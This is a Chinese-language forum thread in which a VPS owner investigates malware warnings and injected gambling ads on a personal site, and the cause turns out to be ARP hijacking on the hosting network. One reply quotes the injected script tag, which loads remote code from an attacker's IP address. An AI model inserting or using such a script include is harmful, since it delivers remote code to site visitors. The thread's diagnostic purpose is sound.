V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
ob
V2EX  ›  问与答

遇到一个棘手的问题,服务器被注入恶意软件了,求助。

  •  
  •   ob · 2017-01-14 12:39:40 +08:00 · 4776 次点击
    这是一个创建于 2868 天前的主题,其中的信息可能已经有所发展或是发生改变。
    自己在 VPS 上面搭建本人的一两个小站,今天早上访问的时候突然弹出恶意软件的提示:

    chrome 访问时的红色警告:
    ----------------------------------------------------
    您要访问的网站包含恶意软件

    攻击者可能会试图通过 60.210.98.240 在您的计算机上安装危险程序,以窃取或删除您的信息(如照片、密码、通讯内容和信用卡信息)。
    自动向 Google 报告可能出现的安全事件的详细信息。隐私权政策
    ----------------------------------------------------
    其他浏览器也是,点继续访问,文章旁边就显示各种菠菜网站,还有直接跳转到菠菜网站的地址。

    网站都没怎么公开过,基本上都是个人在使用。
    测试情况:
    第一个网站:主页不会,然后点进去的文章,大部分都会提示这个警告,然后有个别文章又不会。
    第二个网站:主页和其他链接都直接提示。
    本地代码连远程数据库访问正常。
    两个网站的代码都很干净。
    ----------------------------------------------------
    近期对服务器的操作,除了用一键脚本安装 kcptun (很多天前的,服务也已经停止,都没启用),也没啥异常操作。

    服务器现在都能正常登录操作。用 last 也没看出什么异常 ip 。
    有人遇到过这种情况么,具体要怎么排查问题?
    紧急求助,谢谢大家!
    32 条回复    2017-01-15 14:51:28 +08:00
    claysec
        1
    claysec  
       2017-01-14 12:45:07 +08:00 via Android
    被人做了 seo 呗,先检查服务器有没有问题,没有的话去谷歌那边申诉下咯
    ob
        2
    ob  
    OP
       2017-01-14 12:57:58 +08:00
    @claysec seo 不大可能吧,我两个站每天的 ip 访问量就我一个,像是内部因素引起的。
    zk8802
        3
    zk8802  
       2017-01-14 14:38:20 +08:00   ❤️ 1
    @ob 楼主留个邮箱,我私下联系你。
    Famio
        4
    Famio  
       2017-01-14 14:42:31 +08:00
    养成良好维护习惯。例如我,定期做快照,出问题解决不了直接回滚。爽啊~~~
    另外,网站附上啊
    ob
        5
    ob  
    OP
       2017-01-14 15:33:50 +08:00
    ob
        6
    ob  
    OP
       2017-01-14 15:42:09 +08:00
    @Famio
    aHR0cDovL3Rvb2xzLm9icm9vbS5jb20v
    私人用网站,就不直接公开,想看被感染的效果用 base64 转下。
    点确点会跳到菠菜网站,点取消,会直接在主页旁边显示广告出来。

    @zk8802
    ob
        7
    ob  
    OP
       2017-01-14 15:48:08 +08:00
    @zk8802
    @Famio

    在顶部直接被插入了一行:
    <script src=http://60.210.98.240:280/jquery2.js></script>

    确认过,在代码里面是没有的,不知道怎么做到的,域名采用 dnspod.cn 解析.
    artandlol
        8
    artandlol  
       2017-01-14 16:13:24 +08:00 via Android
    @ob 页面贴下
    看大家是否一样
    如果都类似说明你的站被黑了
    cos
        9
    cos  
       2017-01-14 16:21:41 +08:00
    首先还是排除一下你本地的系统是否干净吧,比如搞张 linux livecd 启动后再浏览你的网站看看,再就是路由器,再就是 ISP 的 http 劫持,一个个都排除了,那就是服务器的问题了,另外,有些虚拟主机服务商也会给网站插广告代码的。。。
    ob
        10
    ob  
    OP
       2017-01-14 16:45:52 +08:00
    @artandlol
    aHR0cDovL3Rvb2xzLm9icm9vbS5jb20v
    用 base64 转下能看到。
    ob
        11
    ob  
    OP
       2017-01-14 16:48:37 +08:00
    @cos 手机浏览器上面访问都出问题,然后在 pc 上面一样的情况。排除 ISP 的 http 劫持。
    我买的这个好几年了,正常应该是不会,后面找不到问题,我提个工单问一下。
    再不行,得重装系统了,要弄一大堆东西,比较麻烦。
    目前不知道怎么排查这个问题。
    zk8802
        12
    zk8802  
       2017-01-14 16:56:35 +08:00
    @ob 我没有微信,用邮件联系吧。我可以帮你排查一下问题。
    ob
        13
    ob  
    OP
       2017-01-14 17:05:04 +08:00
    zk8802
        14
    zk8802  
       2017-01-14 17:14:03 +08:00   ❤️ 1
    @ob 你先把网站下线吧,我已经找到漏洞了。
    ob
        15
    ob  
    OP
       2017-01-14 17:16:14 +08:00
    @zk8802 好的
    ob
        16
    ob  
    OP
       2017-01-14 17:16:35 +08:00
    @zk8802 已停止
    zk8802
        17
    zk8802  
       2017-01-14 17:17:41 +08:00   ❤️ 1
    @ob 已发邮件,请查收。
    zk8802
        18
    zk8802  
       2017-01-14 18:49:28 +08:00   ❤️ 7
    经过排查,发现不是服务器的问题,而是服务器那边 ISP 劫持了所有 HTTP/1.{0,1} 200 的内容,在页面开头插入了恶意脚本。

    最明显的证据是同 C 段主机的内容也被劫持了,比如 curl -v http://118.193.216.206 ,会发现这个页面的开头也有劫持代码。

    最后非常感谢 @ob 的配合,因为相信互联网上的陌生人是需要极大勇气的。
    vimffs
        19
    vimffs  
       2017-01-14 18:58:09 +08:00
    我看到和 7 楼的一样。
    cyr1l
        20
    cyr1l  
       2017-01-14 19:07:01 +08:00 via iPhone
    ISP 劫持网页放博彩网站的广告,这胆子也太大了,有点猖狂了吧。
    Yien
        21
    Yien  
       2017-01-14 19:50:04 +08:00 via iPhone
    @zk8802
    cos
        22
    cos  
       2017-01-14 20:00:07 +08:00
    @cyr1l 那有什么奇怪的,以前那个 W 宿,听说有个部门专门接流量导流的生意。。。。
    claysec
        23
    claysec  
       2017-01-14 20:01:45 +08:00 via Android
    @ob 那就是运营商那边劫持了。不用说了
    cyr1l
        24
    cyr1l  
       2017-01-14 20:15:06 +08:00 via iPhone
    @cos 接推广链接的见过,还没见过接博彩网站的。
    freestyle
        25
    freestyle  
       2017-01-14 20:58:30 +08:00
    上 https 看下 不出现了说明有劫持
    ob
        26
    ob  
    OP
       2017-01-14 21:02:07 +08:00
    @vimffs
    @Yien
    @cos
    @claysec
    @cyr1l
    @zk8802
    谢谢各位,特别感谢 zk8802 的无私和专业的帮助。
    问题如 zk8802 所定位的一样,确实是 ISP 被劫持。
    已经提交工单,主机提供商已经处理完毕。
    一开始他们只回复已处理,连个解释都没有,后面让技术客服解释具体原因说是:
    “内网有人执行 ARP 劫持,疑似被黑,已经 Kill 。”
    没有担责和抱歉的意思。

    出现这种情况让我觉得,要是很多没去仔细分析网站细节的人,如果偷偷的被劫持一些小的广告或者其他很难被发现的的东西,是不是默默的承受这种劫持?
    主要是这次的劫持太过猖狂和明显,要不然,我估计也发现不到。
    kwx
        27
    kwx  
       2017-01-14 21:43:34 +08:00
    @ob vps 环境时不时会因为有客户主机被黑导致 ARP ,安装 arp 防火墙就可以解决,或强制绑定 VPS 母鸡的 MAC 地址。
    ob
        28
    ob  
    OP
       2017-01-14 22:03:43 +08:00
    @kwx 用的就是你们家的 vps 哦。折腾了半天。
    artandlol
        29
    artandlol  
       2017-01-14 22:26:36 +08:00 via Android
    然而你间接暴露了他的 ip 一大波 100G 的流量正在路上
    ob
        30
    ob  
    OP
       2017-01-14 22:29:53 +08:00
    @artandlol 哈哈,我的站说是还有些漏洞,这样就很尴尬了。
    caomu
        31
    caomu  
       2017-01-14 22:44:34 +08:00 via Android
    这就尴尬了。。。
    claysec
        32
    claysec  
       2017-01-15 14:51:28 +08:00 via Android
    @ob 这运营商。内网还能 arp
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5362 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 32ms · UTC 01:31 · PVG 09:31 · LAX 17:31 · JFK 20:31
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.